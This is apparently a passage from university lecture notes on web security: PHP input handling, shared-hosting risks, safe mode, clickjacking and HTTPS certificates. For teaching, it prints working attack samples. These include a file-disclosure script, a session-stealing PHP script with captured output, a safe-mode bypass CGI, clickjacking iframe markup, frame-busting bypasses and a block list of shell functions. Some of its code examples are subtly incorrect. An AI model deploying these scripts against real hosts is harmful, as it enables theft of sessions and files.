checking it first. Don’t rely on just one defense, aim for defense in depth. PHP Type Juggling PHP is weakly typed. Variables need not be declared with explicit types and PHP can be left to automatically decide how to convert a value of one type to another. Use type casting to avoid type juggling vulnerabilities Suppose that we expect product identifiers (ids) to be integers, then: <?php $myId = filter_var($_GET[’id’],FILTER_VALIDATE_INT); $sql = ’SELECT * FROM table WHERE id = ’.$myId; ?> We are using the integer filter that’s built into PHP5.2. However, the logic could be much more complex, with perhaps operations applied to the value of $myId. To be extra sure that the integer passed to SQL is indeed an integer, we should cast it as such: <?php $myId = filter_var($_GET[’id’],FILTER_VALIDATE_INT ); $sql = ’SELECT * FROM table WHERE id = ’.(int)$myId; ?> Magic Quotes 43 The PHP magic quotes directive was meant to prevent SQL injection by automatically escaping all data in $ GET, $ POST and $ COOKIE by placing backslashes before characters that need to be quoted in database queries etc (according to the addslashes() function). For example, addslashes("O’Connor") returns "O\’Connor" which shouldn’t cause an injection concern when part of a SQL query "SELECT .... O\’Connor ....". However, the escaping using addslashes() may not be native to the DBMS used by your application. You should use mysql real escape string(). You should never rely on Magic Quotes. Magic Quotes Failure The GBK character set is used for simplified Chinese characters. Characters are encoded as one byte or as two bytes. For example, the character is encoded as the two byte value 0xbf5c. This can also be interpreted as two single-byte characters (¿) and (\). Some two-byte values are not defined in the character set. For example, 0xbf27 is invalid and is just two single-byte characters (¿) and (’). Thus, addslashes(0xbf27) can be interpreted as the byte characters (¿) and (’) and will be escaped to give sequence (¿\’). However, the byte value of this resulting string is 0xbf5c27 where the first two bytes are interpreted as a valid character under GBK, followed by a quotation mark, that is the string ( ’). Thus, if the string is to be passed to a database query then it becomes possible to inject a quote into the string and providing a foundation for a SQL injection attack. Magic Quotes Mitigation You should not assume that Magic Quotes is disabled: your application may run on a server over which you have no control. Your code should undo the ’work’ of addslashes functionsafeSQLstr($str) { if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc() ) { $str= stripslashes($str); } return mysqli_real_escape_string($str); } functionsafeHTMLstr($str) { if(function_exists("get_magic_quotes_gpc") && get_magic_quotes_gpc()) { $str= stripslashes($str); } return htmlspecialchars($str); } And you should be clear about the character set your application uses: mysql set charset(’utf8’, $database);. 44 Good Coding Practices Identify input Filter input to application Validate input Sanitize input Escape output Identify application input data sources The application developer must identify all input data to the program. The superglobal arrays $ GET, $ POST, etc. are easy to identify as input. There are also less obvious sources of ’input’: Is there a possibility that Register Globals is set? $ SERVER is an array containing information such as headers, paths, and script locations. Some of its elements are obtained from the server, for example, $ SERVER[’HOST’]. However, others may be manipulated by the client, for example, $ SERVER[’REFERER’]. Best practice treats all elements in $ SERVER as input data. While data from session data stores and databases might not be initially considered as ‘input’, best practice recommends that it be treated as input as it provides defense in depth. And anything else. For example, RSS feeds, web-services, etc. Filter Input There are two main types of filtering: validation and sanitization. Validation is used to validate or check whether the data is as expected (has integrity). For example, whether a date is valid, whether Gender is M or F, whether email address has a valid format, etc. Sanitization will sanitize the data, so it may alter it by removing undesired characters. For example, removing characters that are inappropriate for an email address to contain, but does not validate the data. Filter Input: Validation Function filter var($variable, filter-name) applies the given filter to the value of a variable, returning the filtered data if valid; otherwise false. FILTER VALIDATE EMAIL determines whether email address is valid. FILTER VALIDATE URL determines if URL conforms to RFC2396. FILTER VALIDATE IP determines whether IP address is valid. FILTER VALIDATE INT, FILTER VALIDATE FLOAT, etc. Variations of filter var can be applied to arrays, etc. <?php if (filter_input(INPUT_GET, ’email’, FILTER_VALIDATE_EMAIL)) { echo "This email address is considered valid."; } ?> FILTER SANITIZE EMAIL remove all characters except letters, digits and !#$%&’*+/=?^_‘{|}~@.[] 45 FILTER SANITIZE URL remove all characters except letters, digits and $_.+!*’(),{}|\\^~[]‘<>#%";/?:&=. FILTER SANITIZE NUMBER INT remove all characters except digits, plus and minus sign. .... <?php $email= ... ; $sanitized = filter_var($email, FILTER_SANITIZE_EMAIL); if (filter_var($sanitized, FILTER_VALIDATE_EMAIL)) { echo "This sanitized email address is considered valid."; } else { echo "This (b) sanitized email address is considered invalid.\n"; }?> Validate or Sanitize? Rather than sanitizing data it is considered best practice to validate the input data and ask the user to correct it if invalid. For example, consider a poorly conceived path sanitizing filter: $filename= str_replace(’..’, ’.’, $_POST[’filename’]); An improved version: while (strpos($filename, ’..’)!=False) { $filename = str_replace(’..’, ’.’, $filename); } However, we would be better off not sanitizing and simply rejecting a path traversal attempt: use basename() to check. Escape Output When a string is output (to the browser, database, etc.) some characters in the string are not treated as simply string ‘data’ but may have a special interpretation that may be exploited by an attacker. For example, quotation marks enable SQL injection, HTML such as <script> enabling XSS, path traversals ../ enabling path traversal attacks, etc. We cannot simply filter/eliminate all of these characters/sequences as they may be legitimate components of the data. For example, O’Sullivan is valid string data for a name. We must therefore escape the data so that it is treated simply as string data and does not have another interpretation. For example, O’Sullivan is escaped as O\’Sullivan when output as part of a SQL query. You should identify all places in your application that output data and check that the data has been properly escaped. Remember that how you escape data depends on its destination. We escape HTML with htmlentities(), SQL with mysql real escape string(), etc. Shared Hosting A server that hosts a number of different web applications and/or general users is referred to as a shared host. On a conventional operating system it is difficult to provide a high-level of security for a shared hosting environment. One web-application and/or authorized user of the server host may be able to access data of another web-application. 46 If your application is critical then it should be hosted by a dedicated web server that does not host other applications nor does its host provide any other services. Exposed Source Code In a shared hosting environment any user who can write/deploy code on the web server can also read your source code. A server user (malicious or in ignorance) could deploy a web application <?php header(’Content-Type: text/plain’); readfile($_GET[’file’]); ?> allowing any visitor to the web server to access any document on the server. The visitor can also access any file on the server that web server (user) can access. There is no perfect solution to this problem. There are a number of strategies we can adopt in order to minimize the damage that can occur. Different Users The server owner should make sure that the web-server does not run as root/administrator. A best practice is that the web server should run as a dedicated user with privileges limited to only those needed to run the web server (principle of least privilege). Another best practice is to store all your sensitive web application data in a database. Each webapplication developer/ower should have a different user-id and a different user-id for the back-end database. However, one application (user) can access the database of another application (user) by reading the other user’s credential file db.inc.php <?php $db_user= ’simon’; $db_password= ’simonPassword’; ... ?> Limiting Access to Database Credentials The Apache SetEnv directive is used to define environment variables that can be accessed from a PHP application. In the configuration file, owned by root: SetEnv DB_USER "simon" SetEnv DB_PASS "simonPassword" The server host owner (root) should update the configuration file with the application (users) userid/password. This file should be accessible only by root (chmod o:rw httpd.conf). While Apache should run as an ordinary user (not root), at start up its parent does briefly run as root (in order to bind to privileged Port 80) and it reads the configuration file as root. 47 Make sure that phpinfo.php is not available to visitors of the website since this application displays information about the configuration settings. Variables defined in the Apache configuration file can be accessed via the $ SERVER superglobal array in PHP. $db_user= $_SERVER[’DB_USER’]; $db_password= $_SERVER[’DB_PASS’]; This configuration helps to prevent another user of the host server from discovering the web application’s login credentials. However, this scheme cannot be adapted to protect the userids/passwords of different application (users) in a shared hosting environment. Limiting Access to Session Data By default PHP stores session data in a temporary directory that is readable and writable by all users. It is possible to configure PHP so that these files are readable and writable only by the Apache user (and not by the other users for whom the server hosts web pages and applications). For example, on my Mac a dedicated user simonMAMPS runs MAMP (Apache/etc) and a snapshot of my session files directory is: [SF023:MAMP/tmp/php] simon% ls -l -rw------- 1 simonMAMPS MAMPS 36 7 Nov 13:10 sess_17d08779da3de4d8601f2868f1a181b3 -rw------- 1 simonMAMPS MAMPS 28 29 Oct 14:35 sess_820e952d3b331387dccf89a5b9e8d850 These files are read and write only by user simonMAMPS; they cannot be read by the user simon (or any other user). However, PHP scripts run as simonMAMPS and not as the user that wrote the script (eg, simon). Therefore, in a shared hosting environment user simon could write a script to read the session files of another user hosting an application on this system. Stealing Session Data with sessionSteal.php Seach for files that begin with sess in the session directory, parse the contents and print. <?php header(’Content-Type: text/plain’); session_start(); $path= ini_get(’session.save_path’); $handle=dir($path); while ($filename = $handle->read()){ if (substr($filename,0,5)==’sess_’){ $data = file_get_contents("$path/$filename"); if (!empty($data)){ $_SESSION=array(); // clear out session vars session_decode($data); // decode session data and set session vars $session=$_SESSION; echo "Session [" . substr($filename,5) . "]\n"; print_r($session); 48 } } } ?> Stealing Session Data An application owned by simon counts the number of visitor page views: <?php session_start(); if(isset($_SESSION[’views’])) $_SESSION[’views’] = $_SESSION[’views’]+ 1; else $_SESSION[’views’] = 1; $_SESSION[’user’] = $_SERVER[’REMOTE_USER’]; // ... ?> User mike deploys and executes sessionSteal.php: Session [17d08779da3de4d8601f2868f1a181b3] Array ( [views] => 15 [user] => simon ) Session [820e952d3b331387dccf89a5b9e8d850] Array ( [views] => 15 [user] => homer ) Store Session Data in a Database We can modify PHP’s session mechanism so that the session data is stored in the user’s (application) database. CREATE TABLE sessions ( id varchar(32) NOT NULL, access int(10) unsigned, data text, PRIMARY KEY (id) ); The session data for the visitor-count script will be stored in a databasetable accessible only by user (application) simon, while any session data foruser (application) mike is stored in his own separate session database table. Redefining the PHP session mechanism PHP function session set save handler() is used to set the user-level session storage functions that are used within PHP for storing and retrieving data associated with a session. We use it to define new session functions that use database-based session data: session_set_save_handler(’_open’, ’_close’, ’_read’, ’_write’, 49 ’_destroy’, ’_clean’); where open, close, read etc. are the new functions for session opening, closing, reading, etc. Once we define these functions (and invoke the above in our script) then we can then use the session functions and array (session() etc) as normal, but the session data is now stored in the database. Redefining the PHP session mechanism We assume that the user database credentials are defined in the Apache configuration file. function _open(){ global $_sess_db; // can be referenced by the other functions $db_user = $_SERVER[’DB_USER’]; $db_pass = $_SERVER[’DB_PASS’]; $db_host = ’localhost’; if ($_sess_db = mysql_connect($db_host,$db_user,$db_pass)){ return mysql_select_db(’sessions’,$_sess_db); } return FALSE; } function _close(){ global $_sess_db; return mysql_close($_sess_db); } Redefining the PHP session mechanism function _read($id){ global $_sess_db; $id = mysql_real_escape_string($id); $sql = "SELECT data FROM sessions WHERE id = ’$id’"; if ($result = mysql_query($sql, $_sess_db)) { if (mysql_num_rows($result)) { $record = mysql_fetch_assoc($result); return $record[’data’]; } } return ’’; } function _write($id, $data){ global $_sess_db; $access = time(); $id = mysql_real_escape_string($id); $access = mysql_real_escape_string($access); $data = mysql_real_escape_string($data); $sql = "REPLACE INTO sessions VALUES (’$id’, ’$access’, ’$data’)"; return mysql_query($sql, $_sess_db); } Redefining the PHP session mechanism 50 function _destroy($id){ global $_sess_db; $id = mysql_real_escape_string($id); $sql = "DELETE FROM sessions WHERE id = ’$id’"; return mysql_query($sql, $_sess_db); } function _clean($max){ global $_sess_db; $old = time() - $max; $old = mysql_real_escape_string($old); $sql = "DELETE FROM sessions WHERE access < ’$old’"; return mysql_query($sql, $_sess_db); } PHP Safe Mode PHP Safe Mode was PHP’s attempt to solve the problem of shared hosting, among other things. It is enabled by setting safe mode=On in php.ini. However, it turned out to be not particularly effective, is now deprecated, and will be removed from PHP 6.0 onwards. PHP safe mode provides blacklisting/controls over access to functions that are considered dangerous. For example, it is considered dangerous to permit a PHP application to escape to an operating system shell enabling arbitrary operating system commands to be executed; in the php.ini file: disable_functions = escapeshellarg, escapeshellcmd, exec, ... However, it is easy for the web site administrator to overlook certain dangerous functions. If a single dangerous function is overlooked then safe mode is entirely ineffective. Blacklisting functions in Safe Mode A ‘popular’ list of blacklisted functions: disable_functions = escapeshellarg, escapeshellcmd, exec, passthru, proc_close, proc_get_status, proc_open, proc_nice, proc_terminate, shell_exec, system, ini_restore, popen, dl, disk_free_space, diskfreespace, set_time_limit, tmpfile, fopen, readfile, fpassthru, fsockopen, mail, ini_alter, highlight_file, openlog, show_source, symlink, apache_child_terminate, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, parse_ini_file A function that is considered safe (and not on this list) might actually have some potentially ’unsafe’ behavior that was not anticipated or known about by the administrator. For example, a wrapper can be used with fopen() to open a stream to a shell. Also, it is possible that the application might need to use some of the functionality of a blacklisted function. However, safe mode blacklisting is all or nothing. Restricting functions in Safe Mode Safe mode provides a degree separation between different applications whereby an application that is owned by one user may not access files/etc. on the web server that are owned by different user. 51 Restricting a function checks whether the files or directories being operated upon have the same UID (owner) as the script that is being executed, eg, move uploaded file() permitted only if the owner of the executing script is also the owner of the uploaded file and destination directory. chdir() permitted only if the owner of the executing script is also the owner of the new directory. session start() permitted only if the owner of the script is the same as the owner of a session.save path directory if the default files session.save handler is used. ... However, not all functions can be restricted in this way. File Access Controls (not just in safe mode) Can also configure the web server so that an application does not have access to the entire file system. open_basedir "/Applications/MAMP" When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic links are resolved; so it’s not possible to avoid this restriction with a symlink. Bypass safe mode via CGI scripts Shared hosting environments typically offer more than just PHP hosting, for example they may permit users to also host CGI scripts. Executing PHP from withing a CGI wrapper will let you get around the safemode completely. Create a file called bypass.cgi and put the following inside. #!/usr/local/bin/php <? echo "Content-type: text/plain\n\n"; system("echo ’Running PHP outside of safemode!’"); ?> Principle of Least Privilege An entity (application) should have access to only those resources that it needs in order to carry out its function Specifying security controls only in terms of what is not permitted is generally dangerous as any oversight in the policy may lead to a vulnerability that can be exploited by an attacker. It is considered good practice to consider of security in terms of what is permitted, and that everything else is not permitted. In this case any oversight in the policy results in a denial of access (which can be rectified). From the PHP site: “The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren’t very realistic, many people, especially ISP’s, use safe mode for now.” 52 Clickjacking HTML Frames HTML allows for any web site to frame any URL with an IFRAME <iframe id="moodle" class="moodle" width=800 height=300 src="http://csa6.ucc.ie/moodle/course/view.php?id=18" scrolling=no></iframe> Making HTML Frames Invisible We can make the contents of the iframe invisible; all the links in the page are still active and can be followed. <style> iframe.moodle{opacity:0;filter:alpha(opacity=0)} </style> <iframe id="moodle" class="moodle" width=800 height=300 src="http://csa6.ucc.ie/moodle/course/view.php?id=18" scrolling=no></iframe> Overlaying HTML Frames We can place things over an HTML frame <style> span.fakebutton_1{background-color:red;font-weight:bold;font-size:12px; position:absolute;top:333px;left:455px; z-index:-40} </style> <iframe id="moodle" class="moodle" width=800 height=300 src="http://csa6.ucc.ie/moodle/course/view.php?id=18" scrolling=no></iframe> <span class="fakebutton_1"><blink> CK </blink></span> Clickjacking Make the frame invisible, place a fake web-page under it and trick the user into clicking on the fake button; the user actually clicks on the button in the invisible overlay frame (It takes a bit of fiddling with getting the fake ‘button’ in the right position on the web-page) In the moodle web-page example, a student hosts a web-page (including the invisible frame, CK button, etc.), tricks Simon into visiting their web-page who then clicks on this button which in turn enables access to term test by all students! <style> span.fakebutton_1{background-color:red;font-weight:bold;font-size:12px; position:absolute;top:333px;left:455px; z-index:-40} iframe.moodle{opacity:0;filter:alpha(opacity=0)} </style> <iframe id="moodle" class="moodle" width=800 height=300 src="http://csa6.ucc.ie/moodle/course/view.php?id=18" scrolling=no></iframe> <span class="fakebutton_1"><blink> CK </blink></span> In practice the attacking web-page should have the button as a part of something ‘useful’. Clickjacking Also called UI redressing and is the same kind of security problem as CSRF. The victim interacts with a page that is controlled by the adversary The interaction requires the victim to click a given target on the page 53 The page includes an iframe which points to the cross-site resource which contains the target that the adversary wants to get clicked This iframe is made invisible by CSS and moved over the click-target By apparently interacting with the page, the victim actually clicks the control on the cross-domain site This attack been used it to (unknowingly) turn on the web cam, send a tweet, accept a verification dialogue, install a Facebook application, … Client side controls The Firefox plugin NoScript can detect scriptjacking attempts. Primitive Frame Breaking The most popular way to defend against clickjacking is to include a ”frame-breaker” script in each page that should not be framed. Consider the following snippet intended to defend against clickjacking: <script>if (top!=self) top.location.href=self.location.href</script> This simple frame breaking script, placed in victim’s (self) webpage, attempts to prevent the victim’s page from being incorporated into a frame or iframe by forcing the parent (top, possible attacker) window to load the current frame’s URL. This works fine if the victim’s web-page is framed by a single page. Busting Walmart Frame Breaking Some sites allow their pages to be framed by their own site. This is usually done by checking document.referrer: if (top.location != location) { if(document.referrer && document.referrer.indexOf("walmart.com") == -1) { top.location.replace(document.location.href); } } This is incorrect: indexOf is used to search for substring, walmart.com is a substring of walmart.com.evil.com and thus the Walmart page can be framed by by an attacker who controls a domain walmart.com.evil.com. Busting (Single) Frame Breaking The attacker puts the victim’s web-page within a frame within a frame. <iframe src="attacker2.html"> <iframe src="http://www.victim.com/"> ... However, many browsers implement the descendant frame navigation policy: a frame can navigate only its descendants. In this case, when the victim’s Frame Breaking code (previous slide) which is contained within the page loaded to the innermost frame attempts to change parent.location of the window to its page self.location a security exception is raised since this innermost frame cannot navigate to its parent frame under the descendant policy. 54 A consequence of the security exception is that the page remains in the innermost frame and subject to clickjacking. Facebook Frame Busting Instead of busting out of its frame, Facebook inserts a gray semi-transparent div that covers all of the content when a profile page is framed. When the user clicks anywhere on the div, Facebook busts out of the frame. This allows content to be framed while blocking clickjacking attacks. Facebook Frame Busting The framing code <body style=’’overflow -x: hidden; border: 0px; margin:0px;’’> <iframe width=’’218000px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0" > </iframe> <script> window.scrollTo(10200,0); </script> The scrollTo function dynamically scrolls to the center of the frame. Facebook Frame Busting The (original) frame busting code if (top!=self) { window.document.write(’’<div style=’background:black; opacity: 0.5; filter: alpha(opacity=50); position: absolute; top:0px; left: 0px; width: 999px; height: 999px; z-index: 1000001’ onClick=’top.location.href=window.location.href’> </div>’’); } This div is positioned at (0,0). However, all Facebook’s content is centered in the frame. This defence can be defeated by making the enclosing frame sufficiently large so that the center of the frame is outside the dark div area. Best for now Frame Breaking [OWASP-2011] Although no completely reliable JavaScript exists (since new attacks surface regularly), a best-fornow snippet is often used: <head> <style> body { display : none;} </style> </head> <body> <script> if (self == top) { var theBody = document.getElementsByTagName(’body’)[0]; 55 theBody.style.display = "block"; } else { top.location = self.location; } </script> Note that this should be used in combination with a secure response header. Conclusions Currently, all existing Frame Breaking code can be broken across all browsers Server side generated defenses are on the way .... Client-side defenses in the browser work: use NoScript (Firefox) or other commercial plugins. HTTPS Network Security An untrusted public network. Problems: Eve eavesdrops on network packets, Eve modifies network packets, Eve injects messages pretending to come from Alice/Bob, .... Confidentiality - Data cannot be read by unintended recipients; Integrity - Data cannot be altered without detection; Authentication - Data attributed to correct originator; Cryptography A cryptographic cipher is a pair of Encrypt and Decrypt algorithms such that given plaintext P, encryption key K1 and decryption key K2 then D(K2,E(K1, P)) = P In absence of knowledge about K2, it must be not be feasible to recover P from the ciphertext E(K1, P). Given P and E(K1, P), it must not be feasible to recover K1 Note that the plaintext P can be any data, including plain text. We call E(K1, P) the ciphertext. Symmetric/Secret key cryptography: K1 = K2; Public key cryptography Cryptography: K1 6= K2 Secure Communication Bob (browser) wishes to communicate securely with Alice (web server). 56 If Alice and Bob share a secret symmetric encryption key KAB then B → A : E(KAB,message(eg credit card details)) and A can decrypt the message as message = D(KAB,E(KAB,message)) A can also use KAB to send data securely to B A → B : E(KAB,message) If B can be sure that they only other principal who knows the secret key KAB is A then he can feel safe about sending credit card details to the web-server. However, how does A and B come to share the secret key KAB? Authentication Suppose that A has a (encryption) public key KA and a corresponding (decryption) private key K A−1 where D(KA−1 ,E(KA, P)) = P and that A’s public key is widely known. If B knows that A’s public key is KA then B could first propose a random key KAB and send it securely to A using B → A : E(KA, [KAB...]) B knows that the only principal who can discover his proposed secret key KAB is A since only A knows the private decryption key KA−1. Therefore, after the above exchange B can be sure that only KAB is known to A. This is a very simple example of a secure key exchange protocol: the two parties exchange a series of messages, after which they share a secret symmetric key. It is also a very simple variation of the SSL/TLS protocol. HTTPS = HTTP + SSL The HTTPS protocol uses SSL/TLS to establish a shared secret key KAB between a browser B and a web-server A. One the key exchange protocol has completed then all subsequent HTTP requests and responses are encrypted using this key. Public Key Certificates How does the browser B come to learn that A’s public key is KA? A public key certificate is a statement that is issued and signed by a trusted third party declaring that a given principal (eg A) owns a given public key (eg KA). 57 This trusted third party is called a Certification Authority and the CA uses its own private key to ‘sign’ the certificate. This signature can be confirmed by anyone who knows the CA’s public key. A browser contains the public keys of a number of well-known CAs. When a browser first connects to a web-server over HTTPS the server sends its certificate, and if it is signed by a CA that the browser recognizes then the browser can continue the protocol and establish the shared key. Msg 1 B → A hello Msg 2 A → B certificate for KA Msg 3 B → A E(KA, [KAB...]) Msg 4 A → B E(KAB, success...) X500 Names for X509 Certificates We need to be able to uniquely name principals if we are to support universal certificates that bind principal (identities) to their public keys. X500: A proposed hierarchical naming scheme. The intention was that X500 Distinguished Names can be used to give a guaranteed name for everything in the world! C=country, S=state, L=locality, O=organization, OU=organization unit, CN=common name, ... X500 DNs are used to name principals in X509 certificates. 58 X509 PKI in Practice No clear plan on how to organize X500 directory in reality: hierarchical naming suits military and government but does not work for businesses or individuals. In practice, we have just one hierarchy per organization and/or have many commercial CAs that sign certificates for each other and for other principals such as UCC and for individuals. How does Alice learn Bob’s public key? Alice knows and trusts a number of root CAs: eg, verisign. Route from CA Alice trusts to Bob provides certificate chain. Some CAs only certify end-principals: note the danger of delegating to customer’s CA (must be trusted to delegate). HTTPS in the Browser We use the protocol https://www.foo.bar.com to indicate a desire for a secure connection from the browser to the web-server. The secure connection is successful if the certificate is accepted as valid and that web-server demonstrates that it can decrypt the key proposed by the browser and that the Common Name CN in the cert matches the domain in the URL of the request/response. This is a secure authentic connection. Browser gives an indication if the secure connection is successful Don’t embed HTTP content in HTTPS If a page loads over HTTPS, but it includes some content that loads over HTTP then Browser (IE7/Firefox3) does not display lock and/or gives a warning to the user. (Safari does not detect mixed content). However, embedded flash does not give this warning. Thus, a programmer error <embed src=http://www.bank.com/anim.swf> in an HTTPS web page might be exploitable by an attacker! → Check whether this applies to most recent versions of Firefox/IE. Regardless, to be safe, should avoid specifying the protocol in embedded content. <embed src=//www.bank.com/anim.swf> 59 Don’t embed HTTPS content in HTTPS The web page is http, however, its HTML source contains a form <form method= "post" action="https://onlineservices.wachovia.com/..." A visitor using http does not know whether they are actually visiting the wachovia.com website or some site masquerading as wachovia.com and therefore does not know where their login credentials are being sent. A request to http://wachovia.com should have resulted in a re-direct response to https://wachovia.com where the user can then enter their credentials. The visitor should be able to ’see’ that they have a secure connection to the website they expect. Flaws in the HTML An old version of https://www.onsale.com used GET for sensitive form attributes; on some early browsers the URL was not secured by SSL (though the contents of the page were). Regardless, its best to do a POST. Many examples of errors in the html: BT once had a web-server with only 40-bit crypto enabled. Verisign once forgot the ’s’ in an http reference to a page where user provided userid/pin. ... Modern browsers like Firefox provide a range of checks for possible ‘mistakes’. However, it is ultimately the user’s responsibility to ensure that the connection is secure and to the right website. Semantic Attacks An attacker registers the website amason.com and obtains a valid certificate that associates their public key with that website. Valid secure connections can be made by the browser to https://www.amason.com. A browser user might be confused about the domain of https://amazon.com@amason.com/buy.html Recall the GBK Chinese character set. It includes characters that look like /, ?, . and =. 60 Attacker owns domain evil.cn and gets a cert for *.evil.cn Attacker sets up a sub-domain www.bank.com/accounts/login.php?userid=simon.evil.cn How is the ?u interpreted? A browser visiting this web-site under https has a valid secure connection to (a subdomain of) evil.cn, however, the user of the browser probably thinks they are visiting www.bank.com. Extended Validation Certificates A conventional certificate makes few claims about the true identity of the owner of a website. An extended validation certificate requires a human lawyer at the CA to validate the identify of the individual requesting the certificate. These certificates are indented for highly secure connections such as banks. Look at http://verisign.com and http://paypay.com Man in the Middle and Elsewhere Attack Attacker sits between bank.com and user browser. Attacker masquerades as bank.com to user browser. User browser unknowingly connects to attacker via HTTP, Attacker connects to bank via HTTPS Attacker masquerades as bank.com to user browser. User browser mistakenly connects to attacker via HTTPS, Attacker connects to bank via HTTPS Problems with accepting invalid certificates If the browser user is niave and is willing to accept invalid certificates then the browser user will be subject to a man-in-the-middle attack. Suppose that a malicious third party (bunk.com) resides on the connection between the browser and a web-server. The browser sends an https connect request to bank.com. This is intercepted by the man in the middle who passes the request on to bank.com. 61 The man in the middle responds to the browser, masquerading as bank.com but with an invalid certificate (issued to bunk.com. The browser warns the user that the certificate is invalid as its Common Name CN does not match that of the URL (bank.com) that the user is requesting. If the user accepts the invalid certificate then the man in the middle has a secure connection to the user and a secure connection to the bank and can relay (and read/modify) data sent between the user browser and the bank. 62